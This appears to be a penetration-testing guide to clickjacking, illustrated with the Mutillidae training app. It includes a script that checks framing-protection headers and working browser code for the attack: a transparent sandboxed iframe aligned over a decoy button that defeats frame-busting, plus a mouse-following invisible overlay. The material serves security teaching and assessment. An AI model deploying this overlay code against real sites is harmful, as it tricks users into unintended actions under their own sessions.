Click-Jacking


Overview

Clickjacking (also called UI redress) may occur when an attacker is able to frame the target web page inside a page the attacker controls. The attacker then arranges the layers so that the user's clicks land somewhere other than where they appear to. In the variant described here the attacker overlays an invisible block of HTML such as a transparent form on top of the legitimate page: when the user clicks on what they think is the legitimate web page, they are interacting with the overlay instead, filling out and submitting the fake form. The more common variant inverts the layers: the framed target is made transparent and positioned above a visible decoy, so a click the user aims at the decoy is delivered to a real control on the target (a "transfer", "delete" or "follow" button) with the user's own session. Either way the attack works because the browser delivers the click to whichever element is on top, regardless of what the user can see.

Discovery Methodology

Check whether each response from the site sends the X-Frame-Options HTTP header with a value of DENY or SAMEORIGIN, or a Content-Security-Policy header whose frame-ancestors directive restricts framing ('none', 'self' or a specific list of origins). Check every response, not just the landing page: one unprotected page (an error page, a legacy endpoint, an old API path) is enough to frame. Points to watch: frame-ancestors, when present, takes precedence over X-Frame-Options in browsers that support CSP; Content-Security-Policy-Report-Only only reports and blocks nothing; the ALLOW-FROM value is obsolete and ignored by current browsers; and neither header has any effect when delivered in a <meta> tag rather than as a response header. If no header-based protection is present in each response, check if JavaScript "frame-busting" code is present, and treat it as a weak control: a framing page can neutralise it with the iframe sandbox attribute (which removes the framed page's ability to navigate the top window while leaving its scripts and forms enabled) and similar tricks.
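The header rules above, as an added example that is not part of the original page: a small Node script that classifies a captured HTTP response as framable or not from an arbitrary third-party origin. The sample responses are constructed for the demonstration, and checkUrl assumes a Node version with global fetch.

```javascript
// Added example, not from the original page: classify a captured HTTP response
// as framable or not from an arbitrary third-party origin, using the header
// rules described above. All sample responses are constructed for the demo.

// Parse a raw response (status line, headers, blank line, body) into
// {name, value} pairs; header names are case-insensitive so they are lowercased.
function parseHeaders(raw) {
  const lines = raw.split(/\r?\n/);
  if (lines.length && lines[0].startsWith('HTTP/')) lines.shift();
  const headers = [];
  for (const line of lines) {
    if (line.trim() === '') break;             // end of the header block
    const idx = line.indexOf(':');
    if (idx < 0) continue;                     // not a header line
    headers.push({ name: line.slice(0, idx).trim().toLowerCase(),
                   value: line.slice(idx + 1).trim() });
  }
  return headers;
}

// Decide from a header list whether any origin may frame the page.
function assessHeaders(headers) {
  const values = (name) => headers.filter((h) => h.name === name).map((h) => h.value);

  // 1. An enforced CSP frame-ancestors directive overrides X-Frame-Options.
  //    Content-Security-Policy-Report-Only is deliberately not consulted: it only reports.
  for (const policy of values('content-security-policy')) {
    const directive = policy.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (!directive) continue;
    const sources = directive.split(/\s+/).slice(1).map((s) => s.toLowerCase());
    // '*' or a bare scheme source such as "https:" matches every origin of that kind.
    const open = sources.some((s) => s === '*' || /^[a-z][a-z0-9+.-]*:$/.test(s));
    return { framable: open, reason: `CSP "${directive}"` };
  }

  // 2. Fall back to X-Frame-Options. Only DENY and SAMEORIGIN are honoured by
  //    current browsers; ALLOW-FROM is obsolete. Values are split on commas
  //    because the Fetch API joins repeated headers into one string.
  const xfo = values('x-frame-options').flatMap((v) => v.split(','))
    .map((v) => v.trim().toUpperCase()).filter(Boolean);
  if (xfo.length === 0) {
    return { framable: true, reason: 'no X-Frame-Options and no frame-ancestors' };
  }
  if (xfo.every((v) => v === 'DENY' || v === 'SAMEORIGIN')) {
    return { framable: false, reason: `X-Frame-Options ${xfo.join(', ')}` };
  }
  return { framable: true, reason: `unsupported X-Frame-Options value(s): ${xfo.join(', ')}` };
}

function assessFraming(raw) {
  return assessHeaders(parseHeaders(raw));
}

// Live check of one URL (assumes Node 18+ global fetch). Redirects are not
// followed, so the response assessed is the one the browser would frame.
async function checkUrl(url) {
  const res = await fetch(url, { redirect: 'manual' });
  const list = [];
  res.headers.forEach((value, name) => list.push({ name, value }));
  return { url, status: res.status, ...assessHeaders(list) };
}

// Constructed sample responses (not captured from any real site).
const SAMPLE_PROTECTED = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html',
  "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'",
  '',
  '<html>...</html>',
].join('\r\n');

// Looks protected at a glance, but the CSP is report-only and ALLOW-FROM is obsolete.
const SAMPLE_LOOKS_PROTECTED = [
  'HTTP/1.1 200 OK',
  "Content-Security-Policy-Report-Only: frame-ancestors 'none'",
  'X-Frame-Options: ALLOW-FROM https://partner.example',
  '',
].join('\r\n');

const SAMPLE_UNPROTECTED = 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>';
```

Run assessFraming over every response captured during a crawl (a proxy export works well), not just the front page, and review any "framable" verdict by hand: a frame-ancestors list naming specific origins blocks an arbitrary attacker but still deserves a look at who those origins are.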

Exploitation

Frame the target web application page from a page the attacker controls and overlay the page with the desired HTML (or make the frame itself transparent and align the target's real control under a visible decoy). Send a link to the framing page to target users. The click only achieves something if the victim's session is sent with the framed request, so check the target's cookie attributes as part of the assessment: cookies marked SameSite=Strict, or SameSite=Lax (the default that Chromium-based browsers apply to cookies without a SameSite attribute), are not sent on a cross-site iframe load and limit what the attack can do.

Example

Mutillidae overlays the page with a div which follows the mouse around. Wherever the user clicks, they inevitably click the div, which then executes the JavaScript in its onclick handler.
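Both the framing page from the Exploitation section and the mouse-following overlay from the Example above, as an added example in browser JavaScript. This is not Mutillidae's code: the document object is passed in as a parameter so the construction logic can be exercised outside a browser, and TARGET_URL and the pixel offsets are assumptions for the demonstration.

```javascript
// Added example, not Mutillidae's code: the framing page from the Exploitation
// section and the mouse-following overlay from the Example, as browser
// JavaScript. `doc` is passed in rather than using the global `document`
// directly so the construction logic can be exercised outside a browser;
// TARGET_URL and the pixel offsets are assumptions for the demonstration.

const TARGET_URL = 'http://target.example/app/transfer.php';   // assumed target page

// Variant 1: the framed target is made transparent and positioned above a
// visible decoy, so the click the victim aims at the decoy lands on the real
// control inside the frame. `pos` gives where the decoy should appear and
// where the target's own button sits within the framed document.
function buildInvisibleFrame(doc, targetUrl, pos) {
  const decoy = doc.createElement('button');
  decoy.textContent = 'Claim your prize';
  Object.assign(decoy.style, {
    position: 'absolute', top: `${pos.top}px`, left: `${pos.left}px`, zIndex: '1',
  });

  const frame = doc.createElement('iframe');
  frame.setAttribute('src', targetUrl);
  // sandbox without allow-top-navigation defeats frame-busting scripts while
  // keeping the target's own scripts, forms and origin working.
  frame.setAttribute('sandbox', 'allow-forms allow-scripts allow-same-origin');
  Object.assign(frame.style, {
    position: 'absolute',
    // Shift the frame so the target's button sits exactly under the decoy.
    top: `${pos.top - pos.targetButtonTop}px`,
    left: `${pos.left - pos.targetButtonLeft}px`,
    width: '1200px',
    height: '900px',
    border: '0',
    opacity: '0',      // invisible, but still on top and still receives the click
    zIndex: '2',
  });

  doc.body.appendChild(decoy);
  doc.body.appendChild(frame);
  return { decoy, frame };
}

// Variant 2 (the Mutillidae example): an invisible div that follows the mouse,
// so whatever the user clicks, the click hits the div and runs onClick.
const FOLLOWER_SIZE = 40;

// Centre the overlay on the current pointer position.
function moveOverlay(overlay, pageX, pageY) {
  overlay.style.left = `${pageX - FOLLOWER_SIZE / 2}px`;
  overlay.style.top = `${pageY - FOLLOWER_SIZE / 2}px`;
}

function attachFollowingOverlay(doc, onClick) {
  const overlay = doc.createElement('div');
  Object.assign(overlay.style, {
    position: 'absolute', width: `${FOLLOWER_SIZE}px`, height: `${FOLLOWER_SIZE}px`,
    opacity: '0', zIndex: '2147483647',
  });
  overlay.addEventListener('click', onClick);
  doc.addEventListener('mousemove', (e) => moveOverlay(overlay, e.pageX, e.pageY));
  doc.body.appendChild(overlay);
  return overlay;
}

// In a browser, build variant 1. Use one variant per page: the follower's
// z-index would otherwise sit above the frame and swallow the click itself.
if (typeof document !== 'undefined') {
  buildInvisibleFrame(document, TARGET_URL,
    { top: 200, left: 300, targetButtonTop: 420, targetButtonLeft: 150 });
}
```

Variant 1 is the one that matters against a real target because the click reaches the target's own control with the victim's session; variant 2 only runs attacker-controlled JavaScript in the attacker's own page and is useful as a demonstration of how the overlay captures the click. During a test, set opacity to a low non-zero value such as 0.3 first so the alignment of the framed button under the decoy can be checked visually.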